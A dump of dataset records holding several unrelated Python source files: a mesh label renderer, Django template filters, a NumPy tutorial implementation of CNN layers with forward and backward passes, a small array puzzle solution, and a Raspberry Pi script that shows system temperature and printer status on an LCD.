100\n self.robotlib.fail(\"Image has diff: {} %\".format(score_percen))\n else:\n raise AssertionError(\"Bad or not exists path for picture or screen\")\n else:\n raise AssertionError(\"Bad or not exists path for picture or screen\")\n\n\n","sub_path":"WatchUI/WatchUI.py","file_name":"WatchUI.py","file_ext":"py","file_size_in_byte":25745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"7318770","text":"from config import *\nfrom meshutil import *\nfrom colorutil import *\nimport gl.glm as glm\nfrom gl.glrender import *\nimport time\nimport cv2 as cv\n\ndef GenSegmentation(modelName, segIdx, patches):\n sampleMeshPath = conf.MeshPath(modelName, 0)\n vertices, faces = LoadMesh(sampleMeshPath)\n centers, vertexAs, faceAs = FurthestPointSample(vertices, faces, patches, 10)\n\n datas = [centers, vertexAs, faceAs]\n types = ['center', 'vertexAs', 'faceAs']\n for i in range(3):\n segPath = conf.SegmentationPath(modelName, segIdx, 
types[i])\n np.save(segPath, datas[i])\n\ndef GenNewLabel(modelRange, segRange, swiRange, disRange, rotRange, depthAndVertex=True):\n b = ZFAR * ZNEAR / (ZNEAR - ZFAR)\n a = -b / ZNEAR\n\n # preparation\n if depthAndVertex:\n segRange = [-1] + segRange\n segColorMap = GetDistinctColors(NUMPATCH)\n\n renderer = GLRenderer(b'GenNewLabel', FULLSIZE, FULLSIZE, toTexture=True)\n proj = glm.perspective(glm.radians(70), 1.0, ZNEAR, ZFAR)\n for modelName in modelRange:\n vertexColor = None\n for meshIdx in range(conf.meshCnt[modelName]):\n print('Generate label for model {} Mesh {}...'.format(modelName, meshIdx))\n meshPath = conf.GetMeshPath(modelName, meshIdx)\n vertices, faces = LoadMesh(meshPath)\n RegularizeMesh(vertices, modelName)\n faces = faces.reshape([faces.shape[0] * 3])\n vertexBuffer = vertices[faces]\n\n if vertexColor is None:\n vertexColor = GetDistinctColors(vertices.shape[0])\n vertexColorBuffer = (vertexColor[faces] / 255.0).astype(np.float32)\n\n for segIdx in segRange + [-1]:\n # prepare segmentation color\n if segIdx != -1:\n segPath = conf.GetSegmentationPath(modelName, segIdx)\n segmentation = np.load(segPath)\n segColorBuffer = np.zeros([faces.shape[0], 3], np.float32)\n faceColors = segColorMap[segmentation] / 255.0\n segColorBuffer[2::3,:] = segColorBuffer[1::3,:] = segColorBuffer[0::3,:] = faceColors\n\n for swi in swiRange:\n for dis in disRange:\n for rot in rotRange:\n model = glm.identity()\n model = glm.rotate(model, glm.radians(swi - MAXSWI / 2), glm.vec3(0, 1, 0))\n model = glm.translate(model, glm.vec3(0, 0, -dis / 100.0))\n model = glm.rotate(model, glm.radians(rot), glm.vec3(0, 1, 0))\n mvp = proj.dot(model)\n\n viewName = conf.GetViewName(swi, dis, rot)\n if segIdx == -1:\n rgb, z = renderer.draw(vertexBuffer, vertexColorBuffer, mvp.T)\n # save depth view\n depth = ((ZFAR - b / (z - a)) / (ZFAR - ZNEAR) * 255).astype(np.uint8)\n dvPath = conf.GetDepthViewPath(modelName, meshIdx, viewName)\n cv.imwrite(dvPath, depth)\n # save vertex view\n vertexIdx = ImageColor2Idx(rgb, vertices.shape[0] + 1)\n vvPath = conf.GetVertexViewPath(modelName, meshIdx, viewName)\n cv.imwrite(vvPath, vertexIdx)\n else:\n rgb, depth = renderer.draw(vertexBuffer, segColorBuffer, mvp.T)\n # save segmentation view\n seg = ImageColor2Idx(rgb, NUMPATCH + 1)\n svPath = conf.GetSegmentationViewPath(modelName, meshIdx, segIdx, viewName)\n cv.imwrite(svPath, seg)\n\nif __name__ == '__main__':\n pass\n modelRange = ['SCAPE']\n segRange = [i for i in range(1)]\n swiRange = [35]\n disRange = [250]\n rotRange = [i for i in range(0, 360, 15)]\n GenNewLabel(modelRange, segRange, swiRange, disRange, rotRange, True)\n","sub_path":"datagenerate.py","file_name":"datagenerate.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"462894875","text":"import sys\nfrom ae.pipeline.ae_pipeline import AEPipeline\n\ndef main():\n # cmd = \"main --config /home/swei20/AE/configs/test_config.json\"\n # sys.argv = cmd.split()\n # print(sys.argv)\n\n p=AEPipeline()\n p.execute()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ae/scripts/run_ae.py","file_name":"run_ae.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"350014120","text":"import datetime\n\nfrom django.template.base import Library\nfrom django.template.defaultfilters import stringfilter\n\nregister = 
Library()\n\n##################################################\n# Filters\n\n# Dictionary Utilities\n\n@register.filter()\ndef get_item(dictionary, key):\n    value = dictionary.get(key)\n    return value\n\n# String Utilities\n\n@register.filter(is_safe=True)\ndef concat(value, arg):\n    result = str(value) + str(arg)\n    return result\n\n@register.filter()\ndef zeropad(value, num_digits):\n    \"\"\"Zero-pads a value to num_digits digits\n    \"\"\"\n    padded = str(value).zfill(num_digits)\n    return padded\n\n# Formatters\n\n@register.filter()\ndef timestamp(value):\n    try:\n        formatted = datetime.datetime.fromtimestamp(value)\n    except AttributeError:\n        formatted = ''\n    return formatted\n\n@register.filter()\ndef phonenumber(value, country='US'):\n    \"\"\"Formats a phone number for a country\n    \"\"\"\n    import phonenumbers\n    formatted = phonenumbers.format_number(phonenumbers.parse(value, country), phonenumbers.PhoneNumberFormat.NATIONAL)\n    return formatted\n\n@register.filter(is_safe=True)\ndef obfuscate(value):\n    \"\"\"Obfuscates a string\n    \"\"\"\n    from htk.utils.obfuscate import html_obfuscate_string\n    result = html_obfuscate_string(value)\n    return result\n\n@register.filter(is_safe=True)\ndef obfuscate_mailto(value, text=False):\n    \"\"\"Obfuscates a mailto link\n    \"\"\"\n    from htk.utils.obfuscate import html_obfuscate_string\n    email = html_obfuscate_string(value)\n\n    if text:\n        link_text = text\n    else:\n        link_text = email\n\n    # The anchor markup was stripped in the source; reconstructed from the format arguments\n    result = '<a href=\"%s%s\">%s</a>' % (\n        html_obfuscate_string('mailto:'),\n        email,\n        link_text,\n    )\n    return result\n\n# Javascript-related\n\n@register.filter()\ndef jsbool(value):\n    js_value = 'true' if bool(value) else 'false'\n    return js_value\n\n# Requests\n\n@register.filter()\ndef http_header(value):\n    \"\"\"Converts Django HTTP headers to standard format\n    e.g.\n    HTTP_ACCEPT -> Accept\n    HTTP_CACHE_CONTROL -> Cache-Control\n    \"\"\"\n    parts = value.split('_')\n    header_parts = [part.title() for part in parts[1:]]\n    formatted = '-'.join(header_parts)\n    return formatted\n\n##################################################\n# Tags\n\n@register.simple_tag(takes_context=True)\ndef lesscss(context, css_file_path_base, media=None):\n    media = 'media=\"%s\" ' % media if media else ''\n    values = {\n        'css_rel' : context.get('css_rel', 'stylesheet'),\n        'css_ext' : context.get('css_ext', 'css'),\n        'css_file_path_base' : css_file_path_base,\n        'media' : media,\n    }\n    # The <link> tag was stripped in the source; reconstructed from the values dict\n    html = '<link rel=\"%(css_rel)s\" type=\"text/css\" %(media)shref=\"%(css_file_path_base)s.%(css_ext)s\">' % values\n    return html\n\n@register.simple_tag(takes_context=True)\ndef loadjs(context, js_file_path):\n    asset_version = context.get('asset_version')\n    if asset_version:\n        asset_version_str = '?v=%s' % asset_version\n    else:\n        asset_version_str = ''\n    values = {\n        'js_file_path' : js_file_path,\n        'asset_version_str' : asset_version_str,\n    }\n    # The <script> tag was stripped in the source; reconstructed from the values dict\n    html = '<script type=\"text/javascript\" src=\"%(js_file_path)s%(asset_version_str)s\"></script>' % values\n    return html\n
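\n# Example template usage (illustrative only; paths and variable names are placeholders):\n#\n#     {% load htk_tags %}\n#     {{ user.phone|phonenumber }}\n#     {{ counter|zeropad:5 }}\n#     {% lesscss 'css/site' %}\n#     {% loadjs 'js/app.js' %}\n","sub_path":"templatetags/htk_tags.py","file_name":"htk_tags.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"607248069","text":"# File: layers.py\n# Description: Neural Networks for computer vision in autonomous vehicles and robotics\n# Environment: PyCharm and Anaconda environment\n#\n# MIT License\n# Copyright (c) 2018 Valentyn N Sichkar\n# github.com/sichkar-valentyn\n#\n# Reference to:\n# Valentyn N Sichkar. Neural Networks for computer vision in autonomous vehicles and robotics // GitHub platform. 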
DOI: 10.5281/zenodo.1317904\n\n\n\n\n# Creating helper functions for dealing with CNN layers\n\n\nimport numpy as np\n\n\n\"\"\"\nDefining function for naive forward pass for convolutional layer.\n\nInput consists of following:\n x of shape (N, C, H, W) - N data, each with C channels, height H and width W.\n w of shape (F, C, HH, WW) - We convolve each input with F different filters,\n where each filter spans all C channels; each filter has height HH and width WW.\n 'cnn_params' is a dictionary with following keys:\n 'stride' - step for sliding,\n 'pad' - zero-pad frame around input.\n\nFunction returns a tuple of (out, cash):\n feature_maps - output data of feature maps of shape (N, F, H', W') where:\n H' = 1 + (H + 2 * pad - HH) / stride\n W' = 1 + (W + 2 * pad - WW) / stride\n where,\n N here is the same as we have it as number of input images,\n F here is as number of channels of each N (that are now as feature maps).\n cache - is a tuple of (x, w, b, cnn_params), needed in backward pass.\n \n\"\"\"\n\n\ndef cnn_forward_naive(x, w, b, cnn_params):\n # Preparing parameters for convolution operation\n stride = cnn_params['stride']\n pad = cnn_params['pad']\n N, C, H, W = x.shape\n F, _, HH, WW = w.shape\n\n # Cache for output\n cache = (x, w, b, cnn_params)\n\n # Applying to the input image volume Pad frame with zero values for all channels\n # As we have in input x N as number of inputs, C as number of channels,\n # then we don't have to pad them\n # That's why we leave first two tuples with 0 - (0, 0), (0, 0)\n # And two last tuples with pad parameter - (pad, pad), (pad, pad)\n # In this way we pad only H and W of N inputs with C channels\n x_padded = np.pad(x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant', constant_values=0)\n\n # Defining spatial size of output image volume (feature maps) by following formulas:\n height_out = int(1 + (H + 2 * pad - HH) / stride)\n width_out = int(1 + (W + 2 * pad - WW) / stride)\n # Depth of output volume is number of filters which is F\n # And number of input images N remains the same - it is number of output image volumes now\n\n # Creating zero valued volume for output feature maps\n feature_maps = np.zeros((N, F, height_out, width_out))\n\n # Implementing convolution through N input images, each with F filters\n # Also, with respect to C channels\n # For every image\n for n in range(N):\n # For every filter\n for f in range(F):\n # Defining variable for indexing height in output feature map\n # (because our step might not be equal to 1)\n height_index = 0\n # Convolving every channel of the image with every channel of the current filter\n # Result is summed up\n # Going through all input image (2D convolution) through all channels\n for i in range(0, H, stride):\n # Defining variable for indexing width in output feature map\n # (because our step might not be equal to 1)\n width_index = 0\n for j in range(0, W, stride):\n feature_maps[n, f, height_index, width_index] = \\\n np.sum(x_padded[n, :, i:i+HH, j:j+WW] * w[f, :, :, :]) + b[f]\n # Increasing index for width\n width_index += 1\n # Increasing index for height\n height_index += 1\n\n # Returning resulted volumes of feature maps and cash\n return feature_maps, cache\n\n\n\"\"\"\nDefining function for naive backward pass for convolutional layer.\n\nInput consists of following:\n derivatives_out - Upstream derivatives.\n cache - is a tuple of (x, w, b, cnn_params) as in 'cnn_forward_naive' function:\n x of shape (N, C, H, W) - N data, each with C channels, height H and width W.\n w 
of shape (F, C, HH, WW) - We convolve each input with F different filters,\n        where each filter spans all C channels; each filter has height HH and width WW.\n    'cnn_params' is a dictionary with following keys:\n        'stride' - step for sliding,\n        'pad' - zero-pad frame around input.\n\nFunction returns a tuple of (dx, dw, db):\n    dx - gradient with respect to x,\n    dw - gradient with respect to w,\n    db - gradient with respect to b.\n\n\"\"\"\n\n\ndef cnn_backward_naive(derivative_out, cache):\n    # Preparing variables for input, weights, biases, cnn parameters from cache\n    x, w, b, cnn_params = cache\n\n    # Preparing variables with appropriate shapes\n    N, C, H, W = x.shape  # For input\n    F, _, HH, WW = w.shape  # For weights\n    _, _, height_out, width_out = derivative_out.shape  # For output feature maps\n\n    # Preparing variables with parameters\n    stride = cnn_params['stride']\n    pad = cnn_params['pad']\n\n    # Preparing gradients for output\n    dx = np.zeros_like(x)\n    dw = np.zeros_like(w)\n    db = np.zeros_like(b)\n\n    # It is important to remember that cache has the original non-padded input x.\n    # Applying to the input image volume a pad frame with zero values for all channels\n    # (as in the forward pass, only H and W of the N inputs with C channels are padded)\n    x_padded = np.pad(x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant', constant_values=0)\n    # The same padding is applied to dx\n    dx_padded = np.pad(dx, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant', constant_values=0)\n\n    # Implementing backward pass through N input images, each with F filters\n    # Also, with respect to C channels\n    # And calculating gradients\n    # For every image\n    for n in range(N):\n        # For every filter\n        for f in range(F):\n            # Going through the whole input image, mirroring the forward pass;\n            # (height_index, width_index) track the position in the output\n            # feature map, because the step might not be equal to 1\n            height_index = 0\n            for i in range(0, H, stride):\n                width_index = 0\n                for j in range(0, W, stride):\n                    # Calculating gradients\n                    dx_padded[n, :, i:i+HH, j:j+WW] += w[f, :, :, :] * derivative_out[n, f, height_index, width_index]\n                    dw[f, :, :, :] += x_padded[n, :, i:i+HH, j:j+WW] * derivative_out[n, f, height_index, width_index]\n                    db[f] += derivative_out[n, f, height_index, width_index]\n                    width_index += 1\n                height_index += 1\n\n    # Reassigning dx by slicing the pad frame off dx_padded (works for any pad)\n    dx = dx_padded[:, :, pad:pad + H, pad:pad + W]\n\n    # Returning calculated gradients\n    return dx, dw, db\n
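\n\n# Illustrative sanity check, not part of the original file: it compares the\n# analytic bias gradient from 'cnn_backward_naive' with a centered\n# finite-difference estimate on a small random example.\ndef _check_conv_backward_on_biases():\n    np.random.seed(0)\n    x = np.random.randn(2, 3, 5, 5)\n    w = np.random.randn(4, 3, 3, 3)\n    b = np.random.randn(4)\n    params = {'stride': 1, 'pad': 1}\n    out, cache = cnn_forward_naive(x, w, b, params)\n    d_out = np.random.randn(*out.shape)\n    _, _, db = cnn_backward_naive(d_out, cache)\n    h = 1e-6\n    db_numeric = np.zeros_like(b)\n    for k in range(b.shape[0]):\n        b_plus, b_minus = b.copy(), b.copy()\n        b_plus[k] += h\n        b_minus[k] -= h\n        out_plus, _ = cnn_forward_naive(x, w, b_plus, params)\n        out_minus, _ = cnn_forward_naive(x, w, b_minus, params)\n        # Derivative of sum(out * d_out) with respect to b[k]\n        db_numeric[k] = np.sum((out_plus - out_minus) * d_out) / (2 * h)\n    # Relative error should be around 1e-8 or smaller\n    print(np.max(np.abs(db - db_numeric) / (np.abs(db) + np.abs(db_numeric))))\n\n\n\"\"\"\nDefining function for naive forward pass for Max Pooling layer.\n\nInput consists of following:\n    x as input data with shape (N, C, H, W) - N data, each with C channels, height H and width W.\n    'pooling_params' is a dictionary with following keys:\n        'pooling_height' - height of pooling region,\n        'pooling_width' - width of pooling region,\n        'stride' - step (distance) between pooling regions.\n\nFunction returns a tuple of (pooled_output, cache):\n    pooled_output - is output resulted data of shape (N, C, H', W') where:\n        H' = 1 + (H - pooling_height) / stride\n        W' = 1 + (W - pooling_width) / stride\n        where,\n        N here is the same as we have it as number of input images,\n        C here is as number of channels of each N.\n    cache - is a tuple of (x, pooling_params), needed in backward pass.\n\n\"\"\"\n\n\ndef max_pooling_forward_naive(x, pooling_params):\n    # Preparing variables with appropriate shapes\n    N, C, H, W = x.shape  # For input\n\n    # Preparing variables with parameters\n    pooling_height = pooling_params['pooling_height']\n    pooling_width = pooling_params['pooling_width']\n    stride = 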
pooling_params['stride']\n\n # Cache for output\n cache = (x, pooling_params)\n\n # Defining spatial size of output image volume after pooling layer by following formulas:\n height_pooled_out = int(1 + (H - pooling_height) / stride)\n width_polled_out = int(1 + (W - pooling_width) / stride)\n # Depth of output volume is number of channels which is C (or number of feature maps)\n # And number of input images N remains the same - it is number of output image volumes now\n\n # Creating zero valued volume for output image volume after pooling layer\n pooled_output = np.zeros((N, C, height_pooled_out, width_polled_out))\n\n # Implementing forward naive pooling pass through N input images, each with C channels\n # And calculating output pooled image volume\n # For every image\n for n in range(N):\n # Going through all input image through all channels\n for i in range(height_pooled_out):\n for j in range(width_polled_out):\n # Preparing height and width for current pooling region\n ii = i * stride\n jj = j * stride\n # Getting current pooling region with all channels C\n current_pooling_region = x[n, :, ii:ii+pooling_height, jj:jj+pooling_width]\n # Finding maximum value for all channels C and filling output pooled image\n # Reshaping current pooling region from (3, 2, 2) - 3 channels and 2 by 2\n # To (3, 4) in order to utilize np.max function\n # Specifying 'axis=1' as parameter for choosing maximum value out of 4 numbers along 3 channels\n pooled_output[n, :, i, j] = \\\n np.max(current_pooling_region.reshape((C, pooling_height * pooling_width)), axis=1)\n\n # Returning output resulted data\n return pooled_output, cache\n\n\n\"\"\"\nDefining function for naive backward pass for Max Pooling layer.\n\nInput consists of following:\n derivatives_out - Upstream derivatives.\n cache - is a tuple of (x, pooling_params) as in 'max_pooling_forward_naive' function:\n x as input data with shape (N, C, H, W) - N data, each with C channels, height H and width W.\n 'pooling_params' is a dictionary with following keys:\n 'pooling_height' - height of pooling region,\n 'pooling_width' - width of pooling region,\n 'stride' - step (distance) between pooling regions.\n \nFunction returns:\n dx - gradient with respect to x.\n\n\"\"\"\n\n\ndef max_pooling_backward_naive(derivatives_out, cache):\n # Preparing variables with appropriate shapes\n x, pooling_params = cache\n N, C, H, W = x.shape\n\n # Preparing variables with parameters\n pooling_height = pooling_params['pooling_height']\n pooling_width = pooling_params['pooling_width']\n stride = pooling_params['stride']\n\n # Defining spatial size of output image volume after pooling layer by following formulas:\n height_pooled_out = int(1 + (H - pooling_height) / stride)\n width_polled_out = int(1 + (W - pooling_width) / stride)\n # Depth of output volume is number of channels which is C (or number of feature maps)\n # And number of input images N remains the same - it is number of output image volumes now\n\n # Creating zero valued volume for output gradient after backward pass of pooling layer\n # The shape is the same with x.shape\n dx = np.zeros((N, C, H, W))\n\n # Implementing backward naive pooling pass through N input images, each with C channels\n # And calculating output pooled image volume\n # For every image\n for n in range(N):\n # For every channel\n for c in range(C):\n # Going through all pooled image by height and width\n for i in range(height_pooled_out):\n for j in range(width_polled_out):\n # Preparing height and width for current pooling region\n 
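# (ii, jj) is the top-left corner of the current pooling window in the input volume\n                    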
ii = i * stride\n jj = j * stride\n # Getting current pooling region\n current_pooling_region = x[n, c, ii:ii+pooling_height, jj:jj+pooling_width]\n # Finding maximum value for current pooling region\n current_maximum = np.max(current_pooling_region)\n # Creating array with the same shape as 'current_pooling_region'\n # Filling with 'True' and 'False' according to the condition '==' to 'current_maximum'\n temp = current_pooling_region == current_maximum\n # Calculating output gradient\n dx[n, c, ii:ii+pooling_height, jj:jj+pooling_width] += \\\n derivatives_out[n, c, i, j] * temp\n\n # Backward pass for pooling layer will return gradient with respect to x\n # Each pooling region will be filled with '0'\n # or derivative if that value was maximum for forward pass\n # print(x[0, 0, 0:2, 0:2])\n # print()\n # print(dx[0, 0, 0:2, 0:2])\n\n # [[ 0.57775955 -0.03546282]\n # [-1.03050044 -1.23398021]]\n\n # [[-0.93262122 0. ]\n # [ 0. 0. ]]\n\n # Returning gradient with respect to x\n return dx\n\n\n\"\"\"\nDefining function for computing forward pass for Affine layer.\nAffine layer - this is Fully Connected layer.\n\nInput consists of following:\n x - input data in form of numpy array and shape (N, d1, ..., dk),\n w - weights in form of numpy array and shape (D, M),\n b - biases in form of numpy array and shape (M,),\n where input x contains N batches and each batch x[i] has shape (d1, ..., dk).\n We will reshape each input batch x[i] into vector of dimension D = d1 * ... * dk.\n As a result, input will be in form of matrix with shape (N, D).\n It is needed for calculation product of input matrix over weights.\n As weights matrix has shape (D, M), then output resulted matrix will be with shape (N, M).\n \nFunction returns a tuple of:\n affine_output - output data in form of numpy array and shape (N, M),\n cache - is a tuple of (x, w, b), needed in backward pass.\n\n\"\"\"\n\n\ndef affine_forward(x, w, b):\n # Cache for output\n cache = (x, w, b)\n\n # Reshaping input data with N batches into matrix with N rows\n N = x.shape[0]\n x = x.reshape(N, -1)\n # By using '-1' we say that number of column is unknown, but number of rows N is known\n # Resulted matrix will be with N rows and D columns\n # Example:\n # x = np.random.randint(0, 9, (2, 3, 3))\n # print(x.shape) # (2, 3, 3)\n # print(x)\n # [[[3 6 5]\n # [6 3 2]\n # [1 0 0]]\n #\n # [[8 5 8]\n # [7 5 2]\n # [2 1 6]]]\n #\n # x = x.reshape(2, -1)\n # print(x.shape) # (2, 9)\n # print(x)\n # [[3 6 5 6 3 2 1 0 0]\n # [8 5 8 7 5 2 2 1 6]]\n\n # Implementing Affine forward pass.\n # Calculating product of input data over weights\n affine_output = np.dot(x, w) + b\n\n # Returning resulted matrix with shape of (N, M)\n return affine_output, cache\n\n\n\"\"\"\nDefining function for computing backward pass for Affine layer.\nAffine layer - this is Fully Connected layer.\n\nInput consists of following:\n derivatives_out - Upstream derivatives of shape (N, M),\n cache - is a tuple of (x, w, b):\n x - input data in form of numpy array and shape (N, d1, ..., dk),\n w - weights in form of numpy array and shape (D, M),\n b - biases in form of numpy array and shape (M,).\n\nFunction returns a tuple of (dx, dw, db):\n dx - gradient with respect to x of shape (N, d1, ..., dk),\n dw - gradient with respect to w of shape (D, M),\n db - gradient with respect to b of shape (M,).\n\n\"\"\"\n\n\ndef affine_backward(derivatives_out, cache):\n # Preparing variables for input, weights and biases from cache\n x, w, b = cache\n\n # Implementing backward pass for Affine 
layer\n # Calculating gradient with respect to x and reshaping to make shape as in x\n dx = np.dot(derivatives_out, w.T).reshape(x.shape)\n # Calculating gradient with respect to w\n # Reshaping input data with N batches into matrix with N rows and D columns\n N = x.shape[0]\n x = x.reshape(N, -1)\n dw = np.dot(x.T, derivatives_out)\n # Calculating gradient with respect to b\n db = np.dot(np.ones(dx.shape[0]), derivatives_out)\n # db = np.sum(derivatives_out, axis=0)\n\n # Returning calculated gradients\n return dx, dw, db\n\n\n\"\"\"\nDefining function for computing forward pass for ReLU layer.\nReLU layer - this is rectified linear units layer.\n\nInput consists of following:\n x - input data of any shape.\n\nFunction returns a tuple of:\n relu_output - output data of the same shape as x,\n cache - is x, needed in backward pass.\n\n\"\"\"\n\n\ndef relu_forward(x):\n # Cache for output\n cache = x\n\n # Implementing ReLU forward pass\n # Numbers that are less than zero will be changed to 0\n relu_output = np.maximum(0, x)\n\n # Returning calculated ReLU output\n return relu_output, cache\n\n\n\"\"\"\nDefining function for computing backward pass for ReLU layer.\nReLU layer - this is rectified linear units layer.\n\nInput consists of following:\n derivatives_out - Upstream derivatives of any shape,\n cache - is x, of the same shape as derivatives_out.\n\nFunction returns:\n dx - gradient with respect to x.\n\n\"\"\"\n\n\ndef relu_backward(derivatives_out, cache):\n # Preparing variable for input from cache\n x = cache\n\n # Implementing backward pass for ReLU layer\n # Creating array with the same shape as x\n # Filling with 'True' and 'False' according to the condition 'x > 0'\n temp = x > 0\n # Calculating gradient with respect to x\n dx = temp * derivatives_out\n\n # Backward pass for ReLU layer will return gradient with respect to x\n # Each element of the array will be filled with '0'\n # or derivative if that value in x was more than 0\n\n # Returning calculated ReLU output\n return dx\n\n\n\"\"\"\nDefining function for computing Logarithmic loss and gradient for Softmax Classification.\n\nInput consists of following:\n x - input data of shape (N, C),\n where x[i, j] is score for the j-th class for the i-th input. 
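Scores are raw, unnormalized class scores; a max-shifted softmax is applied internally for numerical stability.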
\n y - vector of labels of shape (N,),\n where y[i] is the label for x[i] and 0 <= y[i] < C.\n\nFunction returns:\n loss - scalar giving the Logarithmic loss,\n dx - gradient of loss with respect to x.\n\n\"\"\"\n\n\ndef softmax_loss(x, y):\n # Calculating probabilities\n probabilities = np.exp(x - np.max(x, axis=1, keepdims=True))\n probabilities /= np.sum(probabilities, axis=1, keepdims=True)\n\n # Getting number of samples\n N = x.shape[0]\n\n # Calculating Logarithmic loss\n loss = -np.sum(np.log(probabilities[np.arange(N), y])) / N\n\n # Calculating gradient\n dx = probabilities\n dx[np.arange(N), y] -= 1\n dx /= N\n\n # Returning tuple of Logarithmic loss and gradient\n return loss, dx\n\n","sub_path":"Codes/Image_Classification/Helper_Functions/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":19156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"188459659","text":"class Solution:\n def __init__(self, nums):\n self.nums = nums\n\n def arrayPairSum(self):\n arr = self.nums\n arr = sorted(arr)\n count = sum(arr[::2])\n return count\n\nif __name__ == \"__main__\":\n nums = [1,4,3,2]\n res = Solution(nums).arrayPairSum()\n print(res)","sub_path":"Array/Array_partition_1.py","file_name":"Array_partition_1.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"432421062","text":"#!/usr/bin/env python\n\n#--------+---------+---------+---------+---------+---------+---------+----------\n# Import section:\nimport RPi.GPIO as GPIO\nimport time\nimport subprocess\n\n#--------+---------+---------+---------+---------+---------+---------+----------\n# Global definitions:\n# Define GPIO to LCD mapping\nLCD_RS = 7\nLCD_E = 8\nLCD_D4 = 25\nLCD_D5 = 24\nLCD_D6 = 23\nLCD_D7 = 18\n\n# Define some device constants\nLCD_WIDTH = 16 # Maximum characters per line\nLCD_CHR = True\nLCD_CMD = False\n\nLCD_LINE_1 = 0x80 # LCD RAM address for the 1st line\nLCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line\n\n# Timing constants\nE_PULSE = 0.0005\nE_DELAY = 0.0005\n\n#--------+---------+---------+---------+---------+---------+---------+----------\n# Setup:\nsleep = time.sleep\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM) # Use BCM GPIO numbers\nGPIO.setup(LCD_E, GPIO.OUT) # E\nGPIO.setup(LCD_RS, GPIO.OUT) # RS\nGPIO.setup(LCD_D4, GPIO.OUT) # DB4\nGPIO.setup(LCD_D5, GPIO.OUT) # DB5\nGPIO.setup(LCD_D6, GPIO.OUT) # DB6\nGPIO.setup(LCD_D7, GPIO.OUT) # DB7\n\n#-------------------------------------------------------------------------------\n# Functions:\ndef lcd_init():\n # Initialise display\n lcd_byte(0x33,LCD_CMD) # 110011 Initialise\n lcd_byte(0x32,LCD_CMD) # 110010 Initialise\n lcd_byte(0x06,LCD_CMD) # 000110 Cursor move direction\n lcd_byte(0x0C,LCD_CMD) # 001100 Display On,Cursor Off, Blink Off\n lcd_byte(0x28,LCD_CMD) # 101000 Data length, number of lines, font size\n lcd_byte(0x01,LCD_CMD) # 000001 Clear display\n time.sleep(E_DELAY)\n\ndef lcd_byte(bits, mode):\n # Send byte to data pins\n # bits = data\n # mode = True for character\n # False for command\n\n GPIO.output(LCD_RS, mode) # RS\n\n # High bits\n GPIO.output(LCD_D4, False)\n GPIO.output(LCD_D5, False)\n GPIO.output(LCD_D6, False)\n GPIO.output(LCD_D7, False)\n if bits&0x10==0x10:\n GPIO.output(LCD_D4, True)\n if bits&0x20==0x20:\n GPIO.output(LCD_D5, True)\n if bits&0x40==0x40:\n GPIO.output(LCD_D6, True)\n if bits&0x80==0x80:\n GPIO.output(LCD_D7, True)\n \n 
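# The byte is sent as two nibbles in 4-bit mode; pulse 'Enable' to latch the high nibble before sending the low one\n    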
lcd_toggle_enable()\t\t# Toggle 'Enable' pin\n\n # Low bits\n GPIO.output(LCD_D4, False)\n GPIO.output(LCD_D5, False)\n GPIO.output(LCD_D6, False)\n GPIO.output(LCD_D7, False)\n if bits&0x01==0x01:\n GPIO.output(LCD_D4, True)\n if bits&0x02==0x02:\n GPIO.output(LCD_D5, True)\n if bits&0x04==0x04:\n GPIO.output(LCD_D6, True)\n if bits&0x08==0x08:\n GPIO.output(LCD_D7, True)\n\n # Toggle 'Enable' pin\n lcd_toggle_enable()\n\ndef lcd_toggle_enable():\n # Toggle enable\n time.sleep(E_DELAY)\n GPIO.output(LCD_E, True)\n time.sleep(E_PULSE)\n GPIO.output(LCD_E, False)\n time.sleep(E_DELAY)\n\ndef lcd_string(message,line):\n # Send string to display\n message = message.replace(\"\\n\",\"\")\n message = message.ljust(LCD_WIDTH,\" \")\n lcd_byte(line, LCD_CMD)\n for i in range(LCD_WIDTH):\n lcd_byte(ord(message[i]),LCD_CHR)\n#-------------------------------------------------------------------------------\n# Interrupt Routine:\n\n#--------+---------+---------+---------+---------+---------+---------+----------\n# main loop\ndef main():\n\twhile(1):\n\t\tlcd_init()\n\t\ttemp = subprocess.check_output([\"/opt/vc/bin/vcgencmd\",\"measure_temp\"])\n\t\ttemp = temp.replace(\"'\",\"\")\n\t\tlcd_string(\"Rasbperry Pi 3\",LCD_LINE_1)\n\t\tlcd_string(temp,LCD_LINE_2)\n\t\ttime.sleep(0.5)\n\t\n\t\tlcd_string(\"Raspbian Linux\",LCD_LINE_1)\n\t\tlcd_string(\"Ver. 8.0(jessie)\",LCD_LINE_2)\n\t\ttime.sleep(0.5)\n\t\t\n\t\trepeat =100\n\t\twhile repeat:\n\t\t\tprinter_status = subprocess.check_output([\"/srv/Workspace/Print_Server/check_printer.sh\"])\n\t\t\tnjobs = subprocess.check_output([\"/srv/Workspace/Print_Server/count_jobs.sh\"])\n\t\t\ts2 = \"Jobs: \" + njobs\n\t\t\tif printer_status == \"0\\n\":\n\t\t\t\tlcd_string(\"Printer OFF-LINE\",LCD_LINE_1)\n\t\t\telse:\n\t\t\t\tlcd_string(\"Printer ON-LINE\",LCD_LINE_1)\n\t\t\tlcd_string(s2,LCD_LINE_2)\n\t\t\ttime.sleep(1)\n\t\t\trepeat = repeat -1\n#--------+---------+---------+---------+---------+---------+---------+----------\n# Exception\nif __name__ == '__main__':\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tpass\n\tfinally:\n\t\tlcd_byte(0x01, 